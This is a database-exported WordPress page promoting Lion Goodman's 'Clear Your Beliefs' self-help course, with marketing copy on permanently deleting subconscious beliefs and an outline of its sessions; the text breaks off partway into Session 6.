(2225, 2, '2015-07-08 09:17:43', '2015-07-08 14:17:43', '&nbsp;\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png" alt="clear your beliefs" width="1" height="1" class="aligncenter" /></a></p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\n<p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a 